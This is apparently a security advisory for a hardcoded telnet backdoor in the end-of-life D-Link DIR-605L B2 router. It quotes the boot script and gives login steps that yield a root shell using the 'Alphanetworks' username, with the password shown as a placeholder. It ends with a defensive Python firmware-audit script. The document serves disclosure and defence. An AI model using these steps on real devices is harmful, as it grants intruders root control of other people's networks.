Securin Zero-Days
CVE-2026-42373 - Hardcoded Telnet Backdoor in D-Link DIR-605L B2 (End-of-Life)
Description
D-Link DIR-605L Hardware Revision B2 is an End-of-Life (EOL) consumer router that contains a manufacturer-installed telnet backdoor with hardcoded credentials. This product reached End-of-Life (EOL) on November 17, 2023. D-Link has confirmed it will not release security patches for EOL products.
The telnet daemon starts unconditionally at boot with the username "Alphanetworks" and a static password. This password is stored in plaintext at /etc/alpha_config/image_sign in the firmware filesystem and is identical across all DIR-605L B2 devices. Successful authentication grants a root shell with full administrative control.
Vulnerable Code
Boot Script: /bin/telnetd.sh
This script executes unconditionally at boot. There is no user-facing option to disable the telnet backdoor.
#!/bin/sh
image_sign=`cat /etc/alpha_config/image_sign`
echo "Start telnetd ..." > /dev/console
mfc_mode=`flash get_hwflag mfc`
if [ $mfc_mode = 1 ]; then
timeout=" -t 600"
fi
if [ -f "/usr/bin/login" ]; then
telnetd -l "/usr/bin/login" -u Alphanetworks:$image_sign -i br0 $timeout &
else
telnetd &
fi
QEMU Validation
Tested with qemu-mips-static v7.2.0. Credentials delivered via named pipe (FIFO).
Proof of Concept
An attacker on the same LAN or WiFi network as the DIR-605L B2 (EOL) can gain full root shell access by connecting to the telnet service (TCP port 23) and entering the hardcoded Alphanetworks credentials. No prior authentication, session tokens, or CSRF tokens are required. The backdoor is available immediately after device boot.
Exploitation Steps
Step 1: Connect to telnet on the router (default LAN IP)
telnet 192.168.0.1
Step 2: At the "login:" prompt, enter the hardcoded username:
Alphanetworks
Step 3: At the "Password:" prompt, enter the firmware-specific password:sample
Step 4: Root shell is granted immediately:
id
uid=0(root) gid=0(root)
The attacker now has full control of the router.
Impact
Exploitation grants root shell on the DIR-605L B2 (End-of-Life). An attacker on the LAN/WiFi can:
- Execute arbitrary commands as root
- Read/modify all router configuration including WiFi passwords and DNS settings
- Intercept, redirect, or modify all network traffic
- Install persistent malware or pivot into the internal network
Root Cause
The backdoor originates from Alpha Networks Inc. (Taiwanese ODM). The "Alphanetworks" username, the /etc/alpha_config/ directory, and the wrg-prefixed passwords directly identify the ODM. It was intended for factory testing but was never removed from production firmware.
Remediation
This product is End-of-Life (EOL). No patches will be released by D-Link.
- Replace the device immediately with a currently supported router model.
- Temporary: kill telnetd via backdoor and block port 23 (lost on reboot)
- Do not use this device for any security-sensitive network
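To check an extracted firmware root filesystem for the pattern shown in /bin/telnetd.sh, the following added example (not part of the advisory and not D-Link or Alpha Networks code) flags shell scripts that start telnetd with a fixed "-u user:secret" pair and reports where the secret comes from, without printing it. The function names, the 64 KiB read limit and the sample tree with its placeholder secret are constructed assumptions.

```python
import os
import re
import tempfile

# telnetd started with "-u user:secret", the form used in /bin/telnetd.sh
TELNETD_U = re.compile(r'\btelnetd\b[^\n]*?\s-u\s+([^\s:]+):(\S+)')
# var=`cat /path` or var=$(cat /path): a value read from a file at boot
ASSIGN_CAT = re.compile(r'^\s*(\w+)=(?:`|\$\()\s*cat\s+(\S+?)\s*(?:`|\))', re.M)
VAR_REF = re.compile(r'^"?\$\{?(\w+)\}?"?$')

def audit_rootfs(root):
    """Report scripts under an extracted rootfs that pass fixed credentials to telnetd."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # never follow links out of the image or open device nodes
            with open(path, errors="ignore") as fh:
                text = fh.read(65536)
            if not text.startswith("#!"):  # shell scripts only
                continue
            sources = dict(ASSIGN_CAT.findall(text))
            for user, secret in TELNETD_U.findall(text):
                ref = VAR_REF.match(secret)
                src = sources.get(ref.group(1)) if ref else "literal in script"
                baked = ref is None or bool(
                    src and os.path.isfile(os.path.join(root, src.lstrip("/"))))
                findings.append({"script": os.path.relpath(path, root), "user": user,
                                 "secret_source": src, "baked_into_image": baked})
    return findings

def build_sample_rootfs(root):
    """Constructed sample: two lines of the advisory's boot script, placeholder secret."""
    files = {
        "bin/telnetd.sh": '#!/bin/sh\nimage_sign=`cat /etc/alpha_config/image_sign`\n'
        'telnetd -l "/usr/bin/login" -u Alphanetworks:$image_sign -i br0 $timeout &\n',
        "etc/alpha_config/image_sign": "CONSTRUCTED_PLACEHOLDER\n",
        "etc/init.d/rcS": "#!/bin/sh\necho boot\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_rootfs(tmp)
        print(audit_rootfs(tmp))
```

A finding with baked_into_image set means the credential ships inside the image itself, so every device flashed with that image shares it.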
Disclosure Timeline